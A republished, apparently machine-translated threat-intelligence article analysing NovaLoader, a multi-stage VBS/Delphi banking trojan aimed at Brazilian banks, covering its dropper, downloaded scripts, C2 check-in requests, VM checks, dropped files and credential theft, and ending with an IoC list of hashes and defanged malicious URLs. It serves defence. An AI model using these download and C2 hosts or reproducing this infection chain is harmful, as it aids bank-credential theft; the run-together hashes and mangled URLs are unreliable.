Shulou(Shulou.com)05/31 Report--

This article will explain in detail what kind of software NovaLoader is. The editor thinks it is very practical, so I share it for you as a reference. I hope you can get something after reading this article.

Recently, researchers have detected a very interesting malware activity against Brazilian banks. The malware, called NovaLoader, is developed in Delphi and uses the Visual Basic Script (VBS) scripting language to extend other features. Although the final Payload is not novel, and many researchers have studied it, the multi-stage Payload transmission we found this time has not appeared before.

Propagation method

In previous samples, the malware spread through spam, social work activities and phishing sites. Attackers use a variety of parameters and options to ensure the spread of malware and try to bypass detection of security products. Generally speaking, they mainly take advantage of popular legal services, such as Dropbox, GitHub, Pastebin, AWS and GitLab, as well as dynamic DNS services such as No-IP and DynDNS.

According to the researchers' analysis, NovaLoader uses Autolt, PowerShell and Batch scripts in its infection chain, but this is the first time we have found that it also uses VBS. In addition, in this attack, it also used encryption scripts, rather than just confusing the script code as before.

Master DropperMD5:4ef89349a52f9fcf9a139736e236217e

The main Dropper of this malware is relatively simple: its only function is to decrypt the embedded VB script and run the decrypted script:

The first stage script

The following figure shows the code before and after decryption of the embedded script.

The VBS file will decrypt a URL address (dwosgraumellsa [.] club/cabaco2.txt), download another encryption script, and then run the script after the script is decrypted:

Second stage script

The decrypted code snippet of the downloaded VB script is as follows:

The VB script sends a GET request to http://54.95.36[.]242/contaw.php", probably to let the remote C2 server know that it has been successfully run on the target system. Next, it tries to use WMI to query and detect whether it is currently a virtual machine environment:

NovaLoader will copy the following executable files to the directory "C:\\ Users\\ Public\":

C:\\ Windows\\ (system32 | SysWOW64)\\ rundll32.exeC:\\ Windows\ (system32 | SysWOW64)\\ Magnification.dll

Next, it downloads some dependent files from the following address:

The 32atendimentodwosgraumell [.] club32atendimentodwosgraumell [.] club/mi5a.php file is stored in "C:\ Users\ Public\ {random} 4.zip" after decryption. The 32atendimentodwosgraumell [.] club/mi5a1.zip file is stored as "C:\ Users\ Public\ {random} 1.zip". The storage path for the 32atendimentodwosgraumell [.] club/mi5asq.zip file is "C:\ Users\ Public\ {random} sq.zip".

It then sends multiple GET requests to "54.95.36.242/contaw {1-7} .php":

GET/contaw.phpGET/contaw2.php?w= {redacted} BIT-PC_Microsoft%20Windows%207%20Professional%20_TrueGET/contaw3.php?w= {redacted} BIT-PCGET/contaw4.php?w= {redacted} BIT-PCGET/contaw5.php?w= {redacted} BIT-PCGET/contaw6.php?w= {redacted} BIT-PC_2/1/2019%205:05:06%20PMGET/contaw7.php?w= {redacted} BIT-PC_2/1/2019%205:05:06%20PM_CD=414KbCD1=9160Kb_

In addition, it stores multiple malicious files in the "C:\ Users\ Public\" directory:

Finally, it will use the copied rundll32.exe file to decrypt the DLL and export the function:

The third phase of the Payload is an DLL file that will act as a loader for the final phase Payload. It runs through rundll32.exe, and its main function is to decrypt and load the final phase of Payload.

Final Payload

The final phase of Payload is developed by Delphi and includes a variety of functions such as user credential theft (for major Brazilian banks). It also monitors the title of the browser window, and if a matching Brazilian bank name is detected, the malware will control the target system and establish a connection with the malicious C2 server, and then prevent the user from accessing the real bank online banking page. and operate maliciously in the background.

Some of the commands used by malware are as follows:

Some of the bank-related strings in malware are as follows:

IoCMD5:60e5f9fe1b778b4dc928f9d4067b470b4ef89349a52f9fcf9a139736e236217e100ff8b5eeed3fba85a1f64db319ff4099471d4f03fb5ac5a409a79100cd9349cb2ef5d8a227442d0156de82de526b30a16273279d6fe8fa12f37c57345d42f7ac4152492e9a2c4ed1ff359ee7e990d1fdace867e070df4bf3bdb1ed0dbdb51c4d5d1dfb84ef69f7c47c68e730ec1fb76bf65db5511b06749711235566a6b438c5a573d622750973d90af054a09ab8ddef5f2fd7b0262a5aecc32e879890fb4035803b81efc043691094534662e1351c34340c9045d665b800fcdb8c265eebeca71e09796fb9f8527afdfdd29c7277875a9f779b9cb2b091c9c1eff32b1f9754a7117788259030538601e8020035867ecb9f95cec3debc96ddc1773f6c681d8c a7722ea1ca64fcd7b7ae2d7c86f13013URL:185 [.] 141 [.] 195 [.] 5/prt1.txt185 [.] 141 [.] 195 [.] 81/prt3.txt185 [.] 141 [.] 74/prt1.txtdwosgraumellsa [.] club/cabaco2.txtwn5zweb [.] online/works1.txt23 [.] 94 [.] 243 [.] 101/vdb1.txt167 [.] 114 [.] 31 [.] 95/gdo1.txt 167 [.] That's all for 93/gdo1.txt 's article on "what kind of software is NovaLoader?" Hope that the above content can be helpful to you, so that you can learn more knowledge, if you think the article is good, please share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.